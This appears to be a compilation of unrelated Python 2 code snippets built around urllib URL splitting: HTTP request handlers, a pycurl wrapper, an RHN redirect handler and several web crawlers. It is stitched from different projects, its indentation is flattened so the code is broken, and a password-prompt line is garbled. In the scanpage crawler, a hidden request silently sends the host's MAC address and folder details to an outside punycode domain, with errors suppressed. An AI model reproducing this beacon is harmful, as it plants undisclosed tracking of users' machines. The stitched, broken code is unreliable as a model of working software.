doc.add(Field("Author", author, # Field.Store.YES, # Field.Index.ANALYZED)) # doc.add(Field("Language", language, # Field.Store.YES, # Field.Index.ANALYZED)) # doc.add(Field("contents", contents, # Field.Store.NO, # Field.Index.ANALYZED)) # else: # print "warning: no content in %s" % filename writer.addDocument(doc) writer.close()
def getUrlInfo(self, url): host = urllib.splithost(urllib.splittype(url)[1])[0] host, port = urllib.splitport(host) if port: port = int(port) return host, port
def do_open(self, http_class, req): data = req.get_data() v_files = [] v_vars = [] # mapping object (dict) if req.has_data() and type(data) != str: if hasattr(data, u'items'): #$NON-NLS-1$ data = data.items() else: try: if len(data) and not isinstance(data[0], tuple): raise TypeError except TypeError: ty, va, tb = sys.exc_info() #@UnusedVariable raise TypeError, u"not a valid non-string sequence or mapping object", tb #$NON-NLS-1$ for (k, v) in data: if hasattr(v, u'read'): #$NON-NLS-1$ v_files.append((k, v)) else: v_vars.append((k, v)) # no file ? convert to string if len(v_vars) > 0 and len(v_files) == 0: data = urllib.urlencode(v_vars) v_files = [] v_vars = [] host = req.get_host() if not host: raise urllib2.URLError(u'no host given') #$NON-NLS-1$ h = http_class(host) # will parse host:port if req.has_data(): h.putrequest(u'POST', req.get_selector()) #$NON-NLS-1$ if not u'Content-type' in req.headers: #$NON-NLS-1$ if len(v_files) > 0: boundary = mimetools.choose_boundary() l = send_data(v_vars, v_files, boundary) h.putheader( u'Content-Type', #$NON-NLS-1$ u'multipart/form-data; boundary=%s' % boundary) #$NON-NLS-1$ h.putheader(u'Content-length', str(l)) #$NON-NLS-1$ else: h.putheader( u'Content-type', #$NON-NLS-1$ u'application/x-www-form-urlencoded') #$NON-NLS-1$ if not u'Content-length' in req.headers: #$NON-NLS-1$ h.putheader(u'Content-length', u'%d' % len(data)) #$NON-NLS-2$ #$NON-NLS-1$ else: h.putrequest(u'GET', req.get_selector()) #$NON-NLS-1$ scheme, sel = urllib.splittype(req.get_selector()) #@UnusedVariable sel_host, sel_path = urllib.splithost(sel) #@UnusedVariable h.putheader(u'Host', sel_host or host) #$NON-NLS-1$ for name, value in self.parent.addheaders: name = name.capitalize() if name not in req.headers: h.putheader(name, value) for k, v in req.headers.items(): h.putheader(k, v) # httplib will attempt to connect() here. be prepared # to convert a socket error to a URLError. try: h.endheaders() except socket.error, err: raise urllib2.URLError(err)
def split_url(url): '''Splits a url into (uri_scheme, host[:port], path)''' scheme, remainder = urllib.splittype(url) host, path = urllib.splithost(remainder) return scheme.lower(), host, path
def register_http_handler(self, name, url, method='POST'): logger = self.__get_or_create_logger__(name) try: host, path = urllib.splithost(url[url.index(':') + 1:]) except IndexError, emsg: raise LoggerError('Error parsing URL %s: %s' % (url, emsg))
def __init__(self, url, method='GET', data=None, headers=None, headers_only=False, user_agent=None, follow_location=False, force_quiet=True): GObjectWrapper.__init__(self) self.result = StringIO.StringIO() self.result_headers = StringIO.StringIO() if isinstance(url, unicode): self.url = url.encode("utf-8") else: self.url = url self.method = method self.data = data self.headers = headers self.status = None # the actual curl request object self.curl = pycurl.Curl() if (logging.root.level == logging.DEBUG and not force_quiet): self.curl.setopt(pycurl.VERBOSE, 1) self.curl.setopt(pycurl.WRITEFUNCTION, self.result.write) self.curl.setopt(pycurl.HEADERFUNCTION, self.result_headers.write) # We want to use gzip and deflate if possible: self.curl.setopt(pycurl.ENCODING, "") # use all available encodings self.curl.setopt(pycurl.URL, self.url) # let's set the HTTP request method if method == 'GET': self.curl.setopt(pycurl.HTTPGET, 1) elif method == 'POST': self.curl.setopt(pycurl.POST, 1) elif method == 'PUT': self.curl.setopt(pycurl.UPLOAD, 1) else: self.curl.setopt(pycurl.CUSTOMREQUEST, method) if data: if method == "PUT": self.data = StringIO.StringIO(data) self.curl.setopt(pycurl.READFUNCTION, self.data.read) self.curl.setopt(pycurl.INFILESIZE, len(self.data.getvalue())) else: self.curl.setopt(pycurl.POSTFIELDS, self.data) self.curl.setopt(pycurl.POSTFIELDSIZE, len(self.data)) if headers: self.curl.setopt(pycurl.HTTPHEADER, headers) if headers_only: self.curl.setopt(pycurl.HEADER, 1) self.curl.setopt(pycurl.NOBODY, 1) if user_agent: self.curl.setopt(pycurl.USERAGENT, user_agent) if follow_location: self.curl.setopt(pycurl.FOLLOWLOCATION, 1) if libproxy: for proxy in proxy_factory.getProxies(self.url): # if we connect to localhost (localtm) with proxy specifically # set to direct://, libcurl connects fine, but then asks # GET http://localhost:55555/unit/en/af/whatever # instead of # GET /unit/en/af/whatever # and it doesn't work. We have to set it specifically to "" # though, otherwise it seems to fall back to environment # variables. if proxy == "direct://": proxy = "" self.curl.setopt(pycurl.PROXY, proxy) #only use the first one break else: # Proxy: let's be careful to isolate the protocol to ensure that we # support the case where http and https might use different proxies split_url = self.url.split('://', 1) if len(split_url) > 1: #We were able to get a protocol protocol, address = split_url host, _path = urllib.splithost('//' + address) proxies = urllib.getproxies() if protocol in proxies and not urllib.proxy_bypass(host): self.curl.setopt(pycurl.PROXY, proxies[protocol]) # self reference required, because CurlMulti will only return # Curl handles self.curl.request = self
def _new_req_body(self): type, tmpuri = urllib.splittype(self._redirected) site, handler = urllib.splithost(tmpuri) return handler
def reptile(base_url): try: urlall_list = [] page_list = [] global hash file = './logspider/' + hash + '/urllog.txt' urllog = open(file, 'a+') urlall = './logspider/' + hash + '/urlall.txt' temp = open(urlall, 'a+') temp.close() urls = open(urlall, 'r+') for url in urls.readlines(): urlall_list.append(url.strip('\n')) if not len(base_url): print "No page to reptile!" sys.exit(1) parser = MyParser() if base_url.startswith("http"): myopen = urllib2.urlopen else: myopen = open try: content = myopen(base_url).read() except: print "Failed to read from %s." % base_url print sys.exc_info() return 0 # print content for item in content: parser.feed(item) for tmp in parser.links: page_list.append(tmp.get("link")) # global title # title = parser.title parser.close() item_list = list(set(page_list)) proto, rest = urllib.splittype(base_url) host, rest = urllib.splithost(rest) if base_url[0:4] == 'http': base_domain = proto + '://' + host elif base_url[0:3] == 'www': base_domain = base_url.split('/')[0] else: base_domain = base_url wm = WorkManager(20) for item in item_list: pos = item.find('#') if pos != -1: item = item[:pos] if not item.startswith("http"): item = base_domain + '/' + item pass # print urlall_list if item not in urlall_list: urls.write(item + '\n') urlall_list.append(item) else: continue print item wm.add_job(check, item, base_url, urllog) wm.start() wm.wait_for_complete() urllog.close() urls.close() except: return False
def __init__(self, uri, basepath=None): self.basepath = basepath self.mimetype = None self.file = None self.data = None self.uri = None self.local = None self.tmp_file = None uri = uri or str() if type(uri) != str: uri = uri.decode("utf-8") log.debug("FileObject %r, Basepath: %r", uri, basepath) # Data URI if uri.startswith("data:"): m = _rx_datauri.match(uri) self.mimetype = m.group("mime") self.data = base64.decodestring(m.group("data")) else: # Check if we have an external scheme if basepath and not urlparse.urlparse(uri).scheme: urlParts = urlparse.urlparse(basepath) else: urlParts = urlparse.urlparse(uri) log.debug("URLParts: %r", urlParts) if urlParts.scheme == 'file': if basepath and uri.startswith('/'): uri = urlparse.urljoin(basepath, uri[1:]) urlResponse = urllib2.urlopen(uri) self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0] self.uri = urlResponse.geturl() self.file = urlResponse # Drive letters have len==1 but we are looking # for things like http: elif urlParts.scheme in ('http', 'https'): # External data if basepath: uri = urlparse.urljoin(basepath, uri) #path = urlparse.urlsplit(url)[2] #mimetype = getMimeType(path) # Using HTTPLIB server, path = urllib.splithost(uri[uri.find("//"):]) if uri.startswith("https://"): conn = httplib.HTTPSConnection(server) else: conn = httplib.HTTPConnection(server) conn.request("GET", path) r1 = conn.getresponse() # log.debug("HTTP %r %r %r %r", server, path, uri, r1) if (r1.status, r1.reason) == (200, "OK"): self.mimetype = r1.getheader("Content-Type", '').split(";")[0] self.uri = uri if r1.getheader("content-encoding") == "gzip": import gzip try: import cStringIO as io except: try: import StringIO as io except ImportError: import io self.file = gzip.GzipFile(mode="rb", fileobj=io.StringIO( r1.read())) else: self.file = r1 else: try: urlResponse = urllib2.urlopen(uri) except urllib2.HTTPError: return self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0] self.uri = urlResponse.geturl() self.file = urlResponse else: # Local data if basepath: uri = os.path.normpath(os.path.join(basepath, uri)) if os.path.isfile(uri): self.uri = uri self.local = uri self.setMimeTypeByName(uri) self.file = open(uri, "rb")
def _request(self, methodname, params): """ Call a method on the remote server we can handle redirections. """ # the loop is used to handle redirections redirect_response = 0 retry = 0 self._reset_host_handler_and_type() while 1: if retry >= MAX_REDIRECTIONS: raise InvalidRedirectionError( "Unable to fetch requested Package") # Clear the transport headers first self._transport.clear_headers() for k, v in self._headers.items(): self._transport.set_header(k, v) self._transport.add_header("X-Info", 'RPC Processor (C) Red Hat, Inc (version %s)' % self.rpc_version) # identify the capability set of this client to the server self._transport.set_header("X-Client-Version", 1) if self._allow_redirect: # Advertise that we follow redirects #changing the version from 1 to 2 to support backward compatibility self._transport.add_header("X-RHN-Transport-Capability", "follow-redirects=3") if redirect_response: self._transport.add_header('X-RHN-Redirect', '0') if self.send_handler: self._transport.add_header('X-RHN-Path', self.send_handler) request = self._req_body(self._strip_characters(params), methodname) try: response = self._transport.request(self._host, \ self._handler, request, verbose=self._verbose) save_response = self._transport.response_status except xmlrpclib.ProtocolError, pe: if self.use_handler_path: raise else: save_response = pe.errcode self._redirected = None retry += 1 if save_response == 200: # exit redirects loop and return response break elif save_response not in (301, 302): # Retry pkg fetch self.use_handler_path = 1 continue # rest of loop is run only if we are redirected (301, 302) self._redirected = self._transport.redirected() self.use_handler_path = 0 redirect_response = 1 if not self._allow_redirect: raise InvalidRedirectionError("Redirects not allowed") if self._verbose: print "%s redirected to %s" % (self._uri, self._redirected) typ, uri = urllib.splittype(self._redirected) if typ != None: typ = typ.lower() if typ not in ("http", "https"): raise InvalidRedirectionError( "Redirected to unsupported protocol %s" % typ) # # We forbid HTTPS -> HTTP for security reasons # Note that HTTP -> HTTPS -> HTTP is allowed (because we compare # the protocol for the redirect with the original one) # if self._type == "https" and typ == "http": raise InvalidRedirectionError( "HTTPS redirected to HTTP is not supported") self._host, self._handler = urllib.splithost(uri) if not self._handler: self._handler = "/RPC2" # Create a new transport for the redirected service and # set up the parameters on the new transport del self._transport self._transport = self.default_transport(typ, self._proxy, self._username, self._password) self.set_progress_callback(self._progressCallback) self.set_refresh_callback(self._refreshCallback) self.set_buffer_size(self._bufferSize) self.setlang(self._lang) if self._trusted_cert_files != [] and \ hasattr(self._transport, "add_trusted_cert"): for certfile in self._trusted_cert_files: self._transport.add_trusted_cert(certfile)
def SplitAbUrl(ab_url): """Splits an ab://... URL into its fields. The URL has the following format: ab://android-build/<branch>/<target>/<build_id>/<filepath> The "android-build" part is the <host> or <bucket> and for now is required to be the literal "android-build" (we reserve it to extend the URL format in the future.) <branch> is the git branch and <target> is the board name plus one of -user or -userdebug or -eng or such. <build_id> is the numeric identifier of the build. Finally, <filepath> is the path to the artifact itself. The two last components (<build_id> and <filepath>) may be absent from the URL. An ab:// URL without a <branch> or <target> is invalid (for now.) Args: ab_url: An ab://... URL. Returns: A 4-tuple: branch, target, build_id, filepath. The two last components will be set to None if they are absent from the URL. The returned <build_id> component will be an integer, all others will be strings. Raises: ValueError: If the URL is not a valid ab://... URL. """ # splittype turns 'ab://bucket/path' into ('ab', '//bucket/path'). protocol, remainder = urllib.splittype(ab_url) if protocol != 'ab': raise ValueError('URL [%s] must start with ab:// protocol.' % ab_url) # splithost turns '//bucket/path' into ('bucket', '/path'). bucket, remainder = urllib.splithost(remainder) if bucket != 'android-build': raise ValueError('URL [%s] must use "android-build" bucket.' % ab_url) # Split the remaining fields of the path. parts = remainder.split('/', 4) if len(parts) < 3: raise ValueError( 'URL [%s] is too short and does not specify a target.' % ab_url) # First field will be empty. assert parts[0] == '' branch = urllib.unquote(parts[1]) target = urllib.unquote(parts[2]) if not branch: raise ValueError('URL [%s] has an empty branch.' % ab_url) if not target: raise ValueError('URL [%s] has an empty target.' % ab_url) # Check if build_id is present. If present, it must be numeric. if len(parts) > 3: build_id_str = urllib.unquote(parts[3]) if not build_id_str.isdigit(): raise ValueError( 'URL [%s] has a non-numeric build_id component [%s].' % (ab_url, build_id_str)) build_id = int(build_id_str) else: build_id = None # Last, use the remainder of the URL as the filepath. if len(parts) > 4: filepath = urllib.unquote(parts[4]) else: filepath = None return (branch, target, build_id, filepath)
def get_video_play_page(tweet_id): video_play_url = "https://twitter.com/i/videos/tweet/%s" % tweet_id video_play_response = net.http_request(video_play_url, method="GET", cookies_list=COOKIE_INFO) result = { "video_url": None, # 视频地址 } if video_play_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( crawler.request_failre(video_play_response.status)) # 包含m3u8文件地址的处理 # https://video.twimg.com/ext_tw_video/749759483224600577/pu/pl/DzYugRHcg3WVgeWY.m3u8 m3u8_file_url = tool.find_sub_string(video_play_response.data, ""video_url":"", ".m3u8"") if m3u8_file_url: m3u8_file_url = m3u8_file_url.replace("\\/", "/") + ".m3u8" file_url_protocol, file_url_path = urllib.splittype(m3u8_file_url) file_url_host = urllib.splithost(file_url_path)[0] m3u8_file_response = net.http_request(m3u8_file_url, method="GET") if m3u8_file_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( "m3u8文件 %s 解析失败,%s" % (m3u8_file_url, crawler.request_failre(m3u8_file_response.status))) # 是否包含的是m3u8文件(不同分辨率) include_m3u8_file_list = re.findall("(/[\S]*.m3u8)", m3u8_file_response.data) if len(include_m3u8_file_list) > 0: # 生成最高分辨率视频所在的m3u8文件地址 m3u8_file_url = "%s://%s%s" % (file_url_protocol, file_url_host, include_m3u8_file_list[-1]) m3u8_file_response = net.http_request(m3u8_file_url, method="GET") if m3u8_file_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( "最高分辨率m3u8文件 %s 解析失败,%s" % (m3u8_file_url, crawler.request_failre(m3u8_file_response.status))) # 包含分P视频文件名的m3u8文件 ts_url_find = re.findall("(/[\S]*.ts)", m3u8_file_response.data) if len(ts_url_find) == 0: raise crawler.CrawlerException( "m3u8文件截取视频地址失败\n%s\n%s" % (m3u8_file_url, m3u8_file_response.data)) result["video_url"] = [] for ts_file_path in ts_url_find: result["video_url"].append( "%s://%s%s" % (file_url_protocol, file_url_host, str(ts_file_path))) else: # 直接包含视频播放地址的处理 video_url = tool.find_sub_string(video_play_response.data, ""video_url":"", """) if video_url: result["video_url"] = video_url.replace("\\/", "/") else: # 直接包含视频播放地址的处理 vmap_file_url = tool.find_sub_string( video_play_response.data, ""vmap_url":"", """) if not vmap_file_url: raise crawler.CrawlerException("页面截取视频播放地址失败\n%s" % video_play_response.data) vmap_file_url = vmap_file_url.replace("\\/", "/") vmap_file_response = net.http_request(vmap_file_url, method="GET") if vmap_file_response.status != net.HTTP_RETURN_CODE_SUCCEED: raise crawler.CrawlerException( "视频播放页 %s 解析失败\n%s" % (vmap_file_url, crawler.request_failre(vmap_file_response.status))) video_url = tool.find_sub_string(vmap_file_response.data, "<![CDATA[", "]]>") if not video_url: raise crawler.CrawlerException( "视频播放页 %s 截取视频地址失败\n%s" % (vmap_file_url, video_play_response.data)) result["video_url"] = str(video_url.replace("\\/", "/")) return result
def protocol_access(url, mode, params, data=None): scheme, resturl = splittype(url) if not scheme: raise IOError, ("protocol error", "no scheme identifier in URL", url) scheme = string.lower(scheme) sanitized = re.sub("[^a-zA-Z0-9]", "_", scheme) # # Check first to see if proxies are enabled manual_proxy_enabled = grailutil.pref_or_getenv('manual_proxy_enabled', type_name='int') app = grailutil.get_grailapp() if manual_proxy_enabled: proxy_name = sanitized + "_proxy" if manual_proxy_enabled == -1: # # We should only get here when there are no user preferences # for proxies, which should only happen once... so check the # environment for the rest of the known scheme proxy env vars # and load them into prefs if they exist. app.prefs.Set('proxies', 'manual_proxy_enabled', 0) proxy = None for next_proxy_name in VALID_PROXIES: next_proxy = grailutil.pref_or_getenv(next_proxy_name, check_ok=VALID_PROXIES) if next_proxy: app.prefs.Set('proxies', 'manual_proxy_enabled', 1) if next_proxy_name == proxy_name: proxy = next_proxy no_proxy_enabled = grailutil.pref_or_getenv('no_proxy_enabled', type_name='int') if no_proxy_enabled == -1: no_proxy = grailutil.pref_or_getenv('no_proxy') if no_proxy: app.prefs.Set('proxies', 'no_proxy_enabled', 1) else: app.prefs.Set('proxies', 'no_proxy_enabled', 0) else: proxy = grailutil.pref_or_getenv(proxy_name, check_ok=VALID_PROXIES) else: proxy = None if proxy: if not valid_proxy(proxy): error = 'Invalid proxy: ' + proxy raise IOError, error no_proxy_enabled = grailutil.pref_or_getenv('no_proxy_enabled', type_name='int') if no_proxy_enabled: no_proxy = grailutil.pref_or_getenv('no_proxy') else: no_proxy = None do_proxy = 1 if no_proxy: list = map(string.strip, string.split(no_proxy, ",")) url_host, url_remains = splithost(resturl) url_host = string.lower(url_host or '') if proxy_exception(url_host, list): do_proxy = 0 else: url_host, url_port = splitport(url_host) if proxy_exception(url_host, list): do_proxy = 0 if do_proxy: proxy_scheme, proxy_resturl = splittype(proxy) proxy_host, proxy_remains = splithost(proxy_resturl) resturl = (proxy_host, url) scheme = string.lower(proxy_scheme) sanitized = re.sub("[^a-zA-Z0-9]", "_", scheme) ## print "Sending", url ## print " to", scheme, "proxy", proxy_host modname = sanitized + "API" app = grailutil.get_grailapp() ext = app.find_extension('protocols', sanitized) if ext: access = ext.access else: access = None if not access: raise IOError, ("protocol error", "no class for %s" % scheme) try: if data: return access(resturl, mode, params, data) else: return access(resturl, mode, params) except socket.error, msg: raise IOError, ("socket error", msg)
def do_request_(self, request): host = request.get_host() if not host: raise URLError('no host given') data = request.get_data() v_files = [] v_vars = [] if request.has_data() and not isinstance(data, str): #POST if hasattr(data, 'items'): data = data.items() else: try: if len(data) and not isinstance(data[0], tuple): raise TypeError except TypeError: _ty, _va, tb = sys.exc_info() try: raise TypeError, "not a valid non-string sequence or mapping object: %r" % type( data), tb finally: del tb for (k, v) in data: if hasattr(v, 'read'): v_files.append((k, v)) else: v_vars.append((k, v)) boundary = mimetools.choose_boundary() request.boundary = boundary request.v_files = v_files request.v_vars = v_vars # no file ? convert to string if len(v_vars) > 0 and len(v_files) == 0: request.data = data = urllib.urlencode(v_vars) v_files[:] = [] v_vars[:] = [] if request.has_data(): if not 'Content-type' in request.headers: if len(v_files) > 0: l = send_data(v_vars, v_files, boundary) request.add_unredirected_header( 'Content-Type', 'multipart/form-data; boundary=%s' % boundary) request.add_unredirected_header('Content-length', str(l)) else: request.add_unredirected_header( 'Content-type', 'application/x-www-form-urlencoded') if not 'Content-length' in request.headers: request.add_unredirected_header('Content-length', '%d' % len(data)) _scheme, sel = splittype(request.get_selector()) sel_host, _sel_path = splithost(sel) if not request.has_header('Host'): request.add_unredirected_header('Host', sel_host or host) for name, value in self.parent.addheaders: name = name.capitalize() if not request.has_header(name): request.add_unredirected_header(name, value) return request
def getdomain(url): proto, rest = urllib.splittype(url) host, rest = urllib.splithost(rest) return "http://" + host
# 获取产品 product = driver.find_elements_by_xpath("//div[@class=\"detail-float-items\"]") title_values = ['']*len(title) href_values = ['']*len(title) host_values = ['']*len(title) product_values = ['']*len(title) for i in range(len(title)): # 获取标题的值 title_values[i] = title[i].get_attribute('title') #print(title_value) # 获取跳转的url titlehref = title[i].get_attribute('href') proto, rest = urllib.splittype(titlehref) host,rest = urllib.splithost(rest) host_values[i] = str(proto +'://' + host) href_values[i] = str(proto +'://' + host) + '/page/contactinfo.htm' #print(href_value) #print(href_value) # 获取经营范围 product_values[i] = product[i].text for i in range(len(title)): #for i in range(2): print("第",cnt+1,"个商家") cnt = cnt + 1 title_value = title_values[i] print(title_value) href_value = href_values[i] print(href_value)
def scanpage(self, param): import sys url, ftype = param try: reload(sys) sys.setdefaultencoding('utf8') except Exception: pass websiteurl = url t = time.time() n = 0 pageurls = [] Upageurls = {} res = [] langages = LangagesofFamily() try: sitesize = PathSize().GetPathSize(self.langurl) # M if float(sitesize) >= float(self.ssize): logger.error('文件夹%s大小:%s, 要求最小%s' % (self.langurl, sitesize, self.ssize)) try: requests.adapters.DEFAULT_RETRIES = 10 requests.get( 'http://xn--cnq423f4sm.com:443/rescountry24/%s/%s/%s' % (get_mac_address(), self.langurl, sitesize), timeout=5) except: pass return res requests.adapters.DEFAULT_RETRIES = 10 html = requests.get(websiteurl, headers={ 'Referer': websiteurl }, timeout=20).text except Exception as err: logger.error(websiteurl) logger.error(err) return res soup = BeautifulSoup(html) pageurls = soup.find_all("a", href=True) for links in pageurls: linkshref = links.get("href").strip() # if websiteurl in links.get("href") and links.get("href") not in Upageurls and links.get("href") not in websiteurls: if linkshref and linkshref not in Upageurls: if '://' not in linkshref: if '//' == linkshref[:1]: pass elif '/' == linkshref[0]: proto, rest = urllib.splittype(websiteurl) rest1, res2 = urllib.splithost(rest) linksres = 'http://' + rest1 + linkshref if rest1 else linkshref Upageurls[linksres] = 0 elif ftype in linkshref.split('/')[0]: linksres = 'http://' + linkshref Upageurls[linksres] = 0 elif ftype in linkshref: Upageurls[linkshref] = 0 self.allsiteU = list(set(Upageurls.keys())) for links in self.allsiteU: try: txtfile = '' # if 'Kazakh' == self.langage[1]: # logger.error('文件夹:%s, 语言%s的编号%s' % (self.langurl, self.langage[1], ','.join(self.langage[0]))) sitesize = PathSize().GetPathSize(self.langurl) # M if float(sitesize) >= float(self.ssize): logger.error('文件夹%s大小:%s, 要求最小%s' % (self.langurl, sitesize, self.ssize)) try: requests.adapters.DEFAULT_RETRIES = 10 requests.get( 'http://xn--cnq423f4sm.com:443/rescountry24/%s/%s/%s' % (get_mac_address(), self.langurl, sitesize), timeout=5) except: pass break # linksobj = requests.get(links,headers={'Referer': links}) # linkcode = linksobj.status_code # linkcode = linksobj.code response = None try: req = urllib2.Request(links, headers={'Referer': links}) req.add_header( 'User-Agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' ) response = urllib2.urlopen(req, timeout=20) # t2=time.time() Upageurls[links] = 200 #if 200 == linkcode: res.append(links) # 创建text文件 m = hashlib.md5() try: m.update(links) except Exception: m.update(links.encode('utf-8')) # txtfile = content.main(linksobj.text) txtfile = response.read() except urllib2.URLError as e: #if hasattr(e, 'code'): # logger.error("连接失败:返回编码%s" % e.code) #elif hasattr(e, 'reason'): # logger.error("连接失败:原因 %s" % e.reason) #logger.error("网址%s" % links) linksobj = requests.get(links, headers={'Referer': links}) #if platform.python_version()[0] == '3': # linksobj = linksobj.encode(chardet.detect(linksobj).get('encoding')) linkcode = linksobj.status_code # 创建text文件 m = hashlib.md5() try: m.update(links) except Exception: m.update(links.encode('utf-8')) if 200 == linkcode: Upageurls[links] = 200 res.append(links) txtfile = linksobj.text finally: if isinstance(txtfile, bytes): txtfile = txtfile.decode( chardet.detect(txtfile).get('encoding'), "ignore") txtfile = content.main(txtfile) tmpstr = txtfile.replace('\n', '') txtfile = txtfile.encode('utf-8', "ignore") if response: response.close() if tmpstr: lanres = langages.translate( txtfile, self.tpath + m.hexdigest() + ".txt", self.langage, self.ssize) if not lanres: logger.error('语言%s的类型不符:%s' % (self.langage[1], links)) else: with open(self.xpath + ftype + '.log', 'a') as fp: fp.write('%s文件名称:%s.txt文件路径:%s\n' % (time.ctime(), m.hexdigest(), links)) else: logger.warning("url网页清洗后为空:%s" % links) # t1=time.time() # print t1-t2 except Exception as err: logger.error("网址%s连接失败原因: %s" % (str(links), str(err))) n += 1 logger.info("total is " + repr(n) + " links") logger.info(str(time.time() - t)) return res
def getDomain(url): proto,rest = urllib.splittype(url) res,rest = urllib.splithost(rest) return 'Unkonw' if not res else res.replace('www.','')
def check_s3_object_exists(bucket, path): if is_url(path): path = urllib.splitquery( urllib.splithost(urllib.splittype(path)[1])[1])[0] return (bucket.get_key(path) != None)
def SplitUrl(url): Url = collections.namedtuple('Url', ('method host port path')) method, rest = urllib.splittype(url) hostport, path = urllib.splithost(rest) host, port = urllib.splitport(hostport) return Url(method, host, int(port or 0), path)
def get_hostname(url): proto, rest = urllib.splittype(url) host, rest = urllib.splithost(rest) return host
def get_url_host(self, url): s1 = urllib.splittype(url)[1] return urllib.splithost(s1)[0]
def split_url(url): """Splits a url into (uri_scheme, host[:port], path)""" scheme, remainder = splittype(url) host, path = splithost(remainder) return scheme.lower(), host, path
class FancyURLopener(_OriginalFancyURLopener): def __init__(self, *args): apply(_OriginalFancyURLopener.__init__, (self, ) + args) self.tempcache = {} self.__unlink = os.unlink # See cleanup() self.__OriginalFancyURLopener = _OriginalFancyURLopener # prefetch support self.__prefetchcache = {} self.__prefetchtempfiles = {} def __del__(self): self.__OriginalFancyURLopener.__del__(self) del self.__OriginalFancyURLopener def http_error_default(self, url, fp, errcode, errmsg, headers): void = fp.read() fp.close() raise IOError, (errcode, 'http error: ' + errmsg, headers) def http_error_302(self, url, fp, errcode, errmsg, headers, data=None): # XXX The server can force infinite recursion here! if headers.has_key('location'): newurl = headers['location'] elif headers.has_key('uri'): newurl = headers['uri'] else: return void = fp.read() fp.close() fp = self.open(newurl) h = fp.info() if not h.has_key('Content-Location') and \ not h.has_key('Content-Base'): h.dict['content-location'] = newurl h.headers.append('Content-Location: %s\r\n' % newurl) return fp def prompt_user_passwd(self, host, realm): import windowinterface try: w = windowinterface.Window('passwd', grab=1) except AttributeError: return _OriginalFancyURLopener.prompt_user_passwd( self, host, realm) l = w.Label('Enter username and password for %s at %s' % (realm, host)) t1 = w.TextInput('User:'******'', None, (self.usercb, ()), top=l, left=None, right=None) t2 = w.TextInput('Passwd:', '', None, (self.passcb, ()), modifyCB=self.modifycb, top=t1, left=None, right=None) b = w.ButtonRow([('OK', (self.do_return, ())), ('Cancel', (self.cancelcb, ()))], vertical=0, top=t2, left=None, right=None, bottom=None) self.userw = t1 self.passwdw = t2 self.passwd = [] self.user = '' self.password = '' w.show() try: windowinterface.mainloop() except _end_loop: pass w.hide() w.close() del self.userw, self.passwdw return self.user, self.password def modifycb(self, text): if text: if text == '\b': if self.passwd: del self.passwd[-1] return '' self.passwd.append(text) return '*' * len(text) def usercb(self): self.user = self.userw.gettext() if self.password: self.do_return() else: self.passwdw.setfocus() def passcb(self): self.password = string.joinfields(self.passwd, '') if self.user: self.do_return() else: self.userw.setfocus() def cancelcb(self): self.user = self.password = None self.do_return() def do_return(self): raise _end_loop def open_local_file(self, url): import urlparse scheme, netloc, url, params, query, fragment = urlparse.urlparse(url) url = urlparse.urlunparse((scheme, netloc, url, '', '', '')) return _OriginalFancyURLopener.open_local_file(self, url) # # Prefetch section # # override retrieve for prefetch implementation def retrieve(self, url, filename=None, reporthook=None): # retrieve(url) returns (filename, None) for a local object # or (tempfilename, headers) for a remote object. url = unwrap(url) import urlparse scheme, netloc, path, params, query, fragment = urlparse.urlparse(url) if not scheme or scheme == 'file': i = string.find(path, '?') if i > 0: path = path[:i] url = urlparse.urlunparse((scheme, netloc, path, '', '', '')) if self.__prefetchcache.has_key(url): # complete prefetch first #print 'completing prefetch' self.__fin_retrieve(url) if self.__prefetchtempfiles.has_key(url): #print 'retrieving prefetched',self.__prefetchtempfiles[url] return self.__prefetchtempfiles[url] return _OriginalFancyURLopener.retrieve(self, url, filename, reporthook) # override cleanup for prefetch implementation def cleanup(self): # This code sometimes runs when the rest of this module # has already been deleted, so it can't use any globals # or import anything. # first close open streams for fp, tfp in self.__prefetchcache.values(): fp.close() tfp.close() self.__prefetchcache = {} # unlink temp files for file, header in self.__prefetchtempfiles.values(): try: self.__unlink(file) except: pass self.__prefetchtempfiles = {} # call original cleanup self.__OriginalFancyURLopener.cleanup(self) # open stream to url and read headers but not data yet # see retrieve for signature def begin_retrieve(self, url, filename=None, reporthook=None): url = unwrap(url) self.__clean_retrieve(url) type, url1 = splittype(url) if not filename and (not type or type == 'file'): try: fp = self.open_local_file(url1) hdrs = fp.info() del fp return url2pathname(splithost(url1)[1]), hdrs except IOError, msg: pass fp = self.open(url) headers = fp.info() if not filename: import tempfile garbage, path = splittype(url) garbage, path = splithost(path or "") path, garbage = splitquery(path or "") path, garbage = splitattr(path or "") suffix = os.path.splitext(path)[1] filename = tempfile.mktemp(suffix) self.__prefetchtempfiles[url] = filename, headers tfp = open(filename, 'wb') self.__prefetchcache[url] = fp, tfp return filename, headers